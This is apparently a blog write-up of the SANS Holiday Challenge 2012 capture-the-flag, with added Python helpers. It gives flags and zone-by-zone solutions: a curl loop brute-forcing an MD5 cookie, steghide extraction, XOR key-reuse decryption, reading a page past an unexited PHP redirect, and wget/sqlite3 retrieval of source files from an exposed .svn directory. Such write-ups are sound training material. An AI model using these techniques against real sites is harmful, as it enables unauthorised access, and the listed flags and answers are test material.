Monday, January 7, 2013

SANS Holiday Challenge 2012 Heat Miser Levels: 

http://pen-testing.sans.org/holiday-challenge/2012


Heat Zone 0:
-- The flag for this level is 1732bcff12e6550ff9ea44d594001418 --

Heat Zone 1:
-- The flag for this level is d8c94233daef256c42bb95bd61382e02 --
 View http://heatmiser.counterhack.com/robots.txt
 Find /zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161

Heat Zone 2:
-- The flag for this level is ef963731de7e886226fe4a6a6c2971f1 --
 In the HTML source of the Zone 1 page,
 find /zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49

Heat Zone 3:
-- The flag for this level is 0d524fb8d8f9f88eb9da5b286661a824 --
 Tweet image: https://twitter.com/h34t_m1s3r/status/276824127359295488/photo/1
 and the Snow Miser clue tweet: https://twitter.com/sn0w_m1s3r/status/276824285878812673
 Adjust the image in GIMP to reveal:
 heatmiser.counterhack.com/zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254/

Heat Zone 4:
-- The flag for this level is e3ae414e6d428c3b0c7cff03783e305f --
 Clicking the link through Burp proxy shows the full page being served before the redirect takes effect, because the PHP script does not exit after sending the redirect header.
 There is a hint in the meme tweet.
 At this point you can view the Zone 4 page, which has the link to Zone 5.
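Here is what the "page before the redirect" looks like from the client side, as an added example in Python that is not code from the write-up. RAW_302 is a constructed response modelled on the behaviour described above (a Location header followed by the body the script kept rendering); the Location value is invented, the zone-5 path is the one given in the Heat Zone 5 section below, and the function and class names are mine.

```python
"""Seeing the body that a redirect response still carries (Heat Zone 4).

Added example, not code from the write-up. RAW_302 is a constructed response
modelled on the behaviour described above: the server sends a Location header
but, because the PHP script never exits, keeps rendering the page beneath it.
A client that does not follow the redirect gets to read that body."""
import re
import urllib.error
import urllib.request

# Constructed sample response. The Location target is invented; the zone-5
# path is the one from the Heat Zone 5 section of this write-up.
RAW_302 = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /denied.php\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>\n"
    b"<!-- everything after header('Location: ...') is still sent -->\n"
    b"<a href='/zone-5-15614E3A-CEA7-4A28-A85A-D688CC418287/'>Zone 5</a>\n"
    b"</body></html>\n"
)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status code, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def links_in(body: bytes):
    """Return every href target in the body, whether or not a redirect came with it."""
    return re.findall(r"""href=["']([^"']+)["']""", body.decode("utf-8", "replace"))


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Returning None from redirect_request makes urllib raise HTTPError for the
    3xx instead of following it; that HTTPError is the response, and .read()
    returns the body the server sent along with the Location header."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_without_following(url: str) -> bytes:
    """Network helper (not exercised offline): GET url and return the body of
    the first response even when it is a redirect. Same idea as curl without -L."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        return opener.open(url).read()
    except urllib.error.HTTPError as err:
        return err.read()


if __name__ == "__main__":
    status, headers, body = parse_response(RAW_302)
    print(status, "->", headers.get("location"))
    print("links in the redirect body:", links_in(body))
```

From the shell the same thing is a plain `curl -s -D - URL` with no `-L`: curl prints the 302 headers and then whatever body came with them, which is where the Zone 5 link sits.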

Heat Zone 5:
-- The flag for this level is f478c549e37fa33467241d847f862e6f --
 Identified the UID cookie as the MD5 hash of "1001", with a clue in https://twitter.com/sn0w_m1s3r/status/276871170085773312. Tried a ton of things trying to figure out what value it was supposed to hash.
 Finally brute forced it with the bash script below; the answer was "1".

 z5.sh:
#!/bin/bash
# Usage: ./z5.sh <candidate>
# Fetches the Zone 5 page with UID set to the MD5 of the candidate value.
# md5sum prints "<hash>  -", so keep only the 32 hex characters.
X=$(echo -n "$1" | md5sum | cut -c1-32)
curl -s -L -b "UID=$X" \
  http://heatmiser.counterhack.com/zone-5-15614E3A-CEA7-4A28-A85A-D688CC418287
 END z5.sh


 ch@bluestem:~$ for i in {0..1001}; do echo $i; ./z5.sh $i; done > file.out

 Examined file.out logs for the one that did not have "access denied"
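The identification step (which hash, of what value?) can be done offline before a single request goes out. This is an added example in Python, not the write-up's script: it assumes the cookie is an unsalted hex digest of a short string (which is what UID turned out to be here); the digest-length table and the function names are my own.

```python
"""Working out what a hashed cookie is before brute-forcing it (Heat Zone 5).

Added example, not the write-up's script. Assumes the cookie is an unsalted hex
digest of a short string; the digest-length table and function names are mine."""
import hashlib

# hex digest length -> the hash it most likely is (assumption: common unsalted hashes)
DIGEST_ALGORITHMS = {32: "md5", 40: "sha1", 64: "sha256"}


def hash_hex(algorithm: str, value: str) -> str:
    """Hex digest of value with the named hashlib algorithm (no salt, no newline)."""
    return hashlib.new(algorithm, value.encode()).hexdigest()


def identify_cookie(cookie_hex: str, candidates):
    """Guess the algorithm from the digest length, then return (algorithm, value)
    for the first candidate that hashes to the observed cookie, or None."""
    cookie_hex = cookie_hex.strip().lower()
    algorithm = DIGEST_ALGORITHMS.get(len(cookie_hex))
    if algorithm is None:
        return None
    for value in candidates:
        if hash_hex(algorithm, value) == cookie_hex:
            return algorithm, value
    return None


def candidate_cookies(algorithm: str = "md5", upper: int = 1001):
    """(value, cookie) pairs for 0..upper: the UID values the loop above sends,
    generated once here instead of shelling out to md5sum for every request."""
    return [(str(i), hash_hex(algorithm, str(i))) for i in range(upper + 1)]


if __name__ == "__main__":
    observed = hash_hex("md5", "1001")   # stands in for the cookie seen in the browser
    print(identify_cookie(observed, (str(i) for i in range(2000))))
    for value, cookie in candidate_cookies()[:3]:
        print(f"curl -s -L -b UID={cookie} ...   # candidate {value}")
```

Once the cookie is recognised as md5 of a small integer, the candidate list is the whole search space, and the only part that needs the network is sending each one and looking for the response that is not "access denied".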

SANS Holiday Challenge 2012 Snow Miser Levels: 

http://pen-testing.sans.org/holiday-challenge/2012

Snow Zone 0: 
-- The flag for this level is 3b5a630fc67251aa5555f4979787c93f --

Snow Zone 1: 
 -- The flag for this level is 38bef0b61ba8edda377b626fe6708bfa --
 Photo reflection in https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1
 http://snowmiser.counterhack.com/zone-1-D2E31380-50E6-4869-8A85-F9CDB3AF6226/

Snow Zone 2:
 -- The flag for this level is b8231c2bac801b54f732cfbdcd7e47b7 --

The image off.jpg has the metadata value IceIceBaby!, which is the
 passphrase for steghide extract against off.jpg.

 The extracted data is "zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3"

ch@bluestem:~/snow$ exiftool off.jpg
[...]
User Comment                    : IceIceBaby!
[...]

ch@bluestem:~/snow$ steghide extract -sf off.jpg
Enter passphrase: IceIceBaby!
the file "tmpfile.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "tmpfile.txt".
ch@bluestem:~/snow$ cat tmpfile.txt
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3


Snow Zone 3:
-- The flag for this level is 08ba610172aade5d1c8ea738013a2e99 --

 The link /zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962 was found by grepping the
 Android dump; it sits in data/com.android.browser/cache/webviewCacheChromium/data_2.


ch@bluestem:~/snow/data$ find . -type f -exec grep -a zone-3 '{}' \;  > zone3.out
ch@bluestem:~/snow/data$ grep -a zone-3 zone3.out
[...]
/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962/' class="menu">Zone 3
[...]


Snow Zone 4:
 -- The flag for this level is de32b158f102a60aba7de3ee8d5d265a --

 Both Zone 4 URLs were encrypted with the same key. Since the "zone-4-" part of the strings is the same and the two ciphertexts start with the same bytes, it was just a matter of working backwards: XOR the known string with its ciphertext to get the key, then XOR that key with the other ciphertext to get the unknown string.

 z4.py:
#!/usr/bin/env python

# Known plaintext: "zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B"
list1 = [0x7a, 0x6f, 0x6e, 0x65, 0x2d, 0x34, 0x2d, 0x46, 0x37, 0x36,
         0x37, 0x37, 0x44, 0x41, 0x38, 0x2d, 0x33, 0x44, 0x37, 0x37, 0x2d,
         0x31, 0x31, 0x45, 0x32, 0x2d,
         0x42, 0x42, 0x36, 0x35, 0x2d, 0x45, 0x34, 0x42, 0x46, 0x36, 0x31,
         0x38, 0x38, 0x37, 0x30, 0x39, 0x42]

# Ciphertext of the known string above
list2 = [0x20, 0xd9, 0x16, 0xc6, 0xc2, 0x9e, 0xe5, 0x3c, 0x30, 0xea,
         0x1e, 0xff, 0xc6, 0x3b, 0x1c, 0x72, 0x14, 0x7e, 0xb8, 0x6b, 0x99,
         0x8a, 0x25, 0xc0, 0xcf, 0x1b,
         0xf6, 0x69, 0x39, 0xe8, 0x62, 0x1b, 0x31, 0x32, 0xd8, 0x3a, 0xbb,
         0x16, 0x83, 0xdf, 0x61, 0x92, 0x38]

# Ciphertext of the unknown string, encrypted with the same key
list3 = [0x20, 0xd9, 0x16, 0xc6, 0xc2, 0x9e, 0xe5, 0x43, 0x43, 0xe8,
         0x1f, 0xf1, 0xb1, 0x4c, 0x13, 0x72, 0x65, 0x0c, 0xbf, 0x19, 0x99,
         0x8f, 0x51, 0xb5, 0xc5, 0x1b,
         0xf6, 0x6f, 0x49, 0xec, 0x62, 0x18, 0x40, 0x34, 0xa9, 0x4f, 0xc9,
         0x19, 0x8f, 0xa9, 0x17, 0x98, 0x49]

# XOR the known plaintext with its ciphertext to recover each key byte, then
# XOR that key byte with the second ciphertext to recover the unknown byte.
# One byte value is printed per line; the awk pipeline below turns them into text.
for z in range(len(list1)):
    key = list1[z] ^ list2[z]
    print(key ^ list3[z])

 :END z4.py

 and then use bash to convert output to printable ascii

 ch@bluestem:~$ python z4.py | awk '{printf "%c\n", $1}' | tr -d '\n'
 zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33
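The same attack written out generally, as an added example that is not the write-up's script: the keystream is recovered from one known plaintext/ciphertext pair and applied to any other ciphertext that reused it, and C1 XOR C2 is shown to equal P1 XOR P2, which is how the shared "zone-4-" prefix can be spotted before anything is decrypted. It also covers the partial case where only a prefix of the plaintext is known. The three byte tables are the ones from z4.py above, repacked as hex; the function names are mine.

```python
"""Known-plaintext recovery of a reused XOR keystream (Snow Zone 4).

Added example, not the write-up's code. The three byte strings are the tables
from z4.py above, repacked as hex."""

KNOWN_PT = b"zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B"

# Ciphertext of KNOWN_PT
KNOWN_CT = bytes.fromhex(
    "20 d9 16 c6 c2 9e e5 3c 30 ea 1e ff c6 3b 1c 72 14 7e b8 6b 99 "
    "8a 25 c0 cf 1b f6 69 39 e8 62 1b 31 32 d8 3a bb 16 83 df 61 92 38"
)

# Ciphertext of the unknown URL, produced with the same key
TARGET_CT = bytes.fromhex(
    "20 d9 16 c6 c2 9e e5 43 43 e8 1f f1 b1 4c 13 72 65 0c bf 19 99 "
    "8f 51 b5 c5 1b f6 6f 49 ec 62 18 40 34 a9 4f c9 19 8f a9 17 98 49"
)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(plaintext: bytes, ciphertext: bytes) -> bytes:
    """P XOR C gives back the keystream bytes that covered the known plaintext.
    Only as many bytes as there is known plaintext are recovered."""
    return xor_bytes(plaintext, ciphertext)


def decrypt_with_keystream(ciphertext: bytes, keystream: bytes) -> bytes:
    """Apply recovered keystream bytes to another ciphertext that reused them."""
    return xor_bytes(ciphertext, keystream)


def plaintext_xor(ct_a: bytes, ct_b: bytes) -> bytes:
    """Key cancels out: C1 XOR C2 == P1 XOR P2, with no key knowledge at all.
    Zero bytes mark positions where the two plaintexts agree."""
    return xor_bytes(ct_a, ct_b)


def shared_prefix_length(ct_a: bytes, ct_b: bytes) -> int:
    """How many leading bytes the two plaintexts share, read off the ciphertexts."""
    n = 0
    for byte in plaintext_xor(ct_a, ct_b):
        if byte != 0:
            break
        n += 1
    return n


def recover_target(known_pt: bytes = KNOWN_PT, known_ct: bytes = KNOWN_CT,
                   target_ct: bytes = TARGET_CT) -> str:
    """Full attack: keystream from the known pair, then decrypt the target.
    With a partial known plaintext only that many target bytes come back."""
    keystream = recover_keystream(known_pt, known_ct)
    return decrypt_with_keystream(target_ct, keystream).decode("ascii")


if __name__ == "__main__":
    print("bytes the two plaintexts share:", shared_prefix_length(KNOWN_CT, TARGET_CT))
    print("recovered:", recover_target())
    print("with 20 known bytes only:", recover_target(KNOWN_PT[:20]))
```

The shared-prefix check is the practical tell for key reuse: two ciphertexts whose XOR starts with a run of zero bytes were almost certainly produced with the same keystream over plaintexts with a common header.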



Snow Zone 5:
 -- The flag for this level is 3ab1c5fa327343721bc798f116be8dc6 --

 The hint at https://twitter.com/h34t_m1s3r/status/276875683228176384
 linked to the blog post at http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us, which explains how to get the pristine copy of a page out of an exposed .svn directory.


ch@bluestem:~$ wget http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db
ch@bluestem:~$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
|
noaccess.php|.svn/pristine/41/4134e0e954d144ed932fd639b5a897f9ad47fff9.svn-base
index.php|.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

(The empty first row is the directory node, which has no checksum.)

ch@bluestem:~$ wget snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

Once you have this page, you learn that you need to submit the SHA-1 hash of "$time 7998f77a7dc74f182a76219d7ee58db38be3841c", where $time is the server's current time, or else you are redirected to noaccess.php. noaccess.php has a line that prints the server time, so you read that time, hash it and send it back, all within about 3 minutes.

Here is what I used at the time I did it: 
ch@bluestem:~$ echo -n "2012-12-20 22:36 7998f77a7dc74f182a76219d7ee58db38be3841c" | sha1sum
cdb74ef7530f56fe02fb50702611093305cf9f11

When you use this hash as the password on the Zone 4 page, you are granted access to Zone 5.
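Both halves of this zone in one place, as an added example that is not the write-up's own code: the pristine-path derivation the sqlite3 one-liner performs, run against a constructed in-memory stand-in for wc.db (only the columns the query needs; a real wc.db has many more), and the time-salted SHA-1 token that `echo -n ... | sha1sum` computed above. The salt is the one quoted from index.php; the function names are mine.

```python
"""Snow Zone 5 helpers: pristine-file lookup from an exposed .svn/wc.db and the
time-salted SHA-1 token. Added example, not the write-up's own code. The in-memory
NODES table is a constructed stand-in for the downloaded wc.db."""
import hashlib
import sqlite3

# The salt appended to the server time, as read out of the recovered index.php.
SALT = "7998f77a7dc74f182a76219d7ee58db38be3841c"


def constructed_wc_db() -> sqlite3.Connection:
    """Minimal wc.db: one directory row (no checksum) and the two files from above.
    Subversion stores the checksum column as '$sha1$<40 hex chars>'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    db.executemany("INSERT INTO NODES VALUES (?, ?, ?)", [
        ("", "dir", None),
        ("noaccess.php", "file", "$sha1$4134e0e954d144ed932fd639b5a897f9ad47fff9"),
        ("index.php", "file", "$sha1$7d63810b0da679648fc20b4f1c84680ac08ec872"),
    ])
    return db


def pristine_paths(db: sqlite3.Connection) -> dict:
    """Map each file in the working copy to its .svn/pristine/<xx>/<sha1>.svn-base
    path: strip the 6-character '$sha1$' prefix (substr(checksum, 7) in the
    one-liner above) and use the first two hex characters as the subdirectory."""
    rows = db.execute(
        "SELECT local_relpath, substr(checksum, 7) FROM NODES WHERE checksum IS NOT NULL"
    )
    return {rel: f".svn/pristine/{sha[:2]}/{sha}.svn-base" for rel, sha in rows}


def sha1_hex(data: bytes) -> str:
    """Hex SHA-1 of raw bytes, the same digest sha1sum prints."""
    return hashlib.sha1(data).hexdigest()


def access_token(server_time: str, salt: str = SALT) -> str:
    """SHA-1 of '<server time> <salt>' with no trailing newline, which is what
    'echo -n ... | sha1sum' computes. server_time is the minute printed by
    noaccess.php, e.g. '2012-12-20 22:36'."""
    return sha1_hex(f"{server_time} {salt}".encode())


if __name__ == "__main__":
    for rel, path in pristine_paths(constructed_wc_db()).items():
        print(f"{rel:14s} {path}")
    print(access_token("2012-12-20 22:36"))
```

Against the real site, point sqlite3.connect at the wc.db that wget fetched instead of the constructed table; every path it returns is a file you can pull straight from the web server, which is the whole problem with leaving .svn deployed.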
SANS Holiday Challenge 2012: 

http://pen-testing.sans.org/holiday-challenge/2012

I worked through this challenge over the course of a few weeks and then went back to write up my solutions weeks later, after the holidays.  Luckily, most of my notes and details were in my .bash_history, or else I'd have no idea how I solved many of these. 


Questions:

1. Where did you find the remainder of Snow Miser's Zone 1 URL?
It was pretty easy to see the reflection of the URL in this image from
twitter: https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1


2. What is the key you used with steghide to extract Snow Miser's Zone
2 URL? Where did you find the key?

The key (IceIceBaby!) was in the User Comment metadata for off.jpg.
This key was used with steghide to extract the hidden url data.

ch@bluestem:~/snow$ steghide extract -sf off.jpg
Enter passphrase: IceIceBaby!
the file "tmpfile.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "tmpfile.txt".
ch@bluestem:~/snow$ cat tmpfile.txt
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3


3. On Snow Miser's Zone 3 page, why is using the same key multiple
times a bad idea?

Using the same key for more than one message means a single known plaintext gives away the key for all of them: XOR the known Zone 4 URL with its ciphertext to recover the key, then XOR that key with the other ciphertext to read the unknown URL (see Snow Zone 4 above). The Zone 3 URL itself was found in the Android data file data/com.android.browser/cache/webviewCacheChromium/data_2 from the
android image linked here:  https://twitter.com/h34t_m1s3r/status/276828387853611008


4. What was the coding error in Zone 4 of Heat Miser's site that
allowed you to find the URL for Zone 5?

The PHP redirect did not exit the script after running.  So the full page was downloaded and the data was visible using a proxy or tool that didn't follow the redirect.


5.  How did you manipulate the cookie to get to Zone 5 of Heat Miser's
Control System?

The cookie was the MD5 sum of "1001", which was hinted at here:
https://twitter.com/sn0w_m1s3r/status/276871170085773312.  I tried replacing the cookie a bunch of times with MD5 hashes of different values.  It turned out to want the MD5 sum of the number "1".

6. Please briefly describe the process, steps, and tools you used to
conquer each zone, including all of the flags hidden in the comments
of each zone page.

Blog posts to follow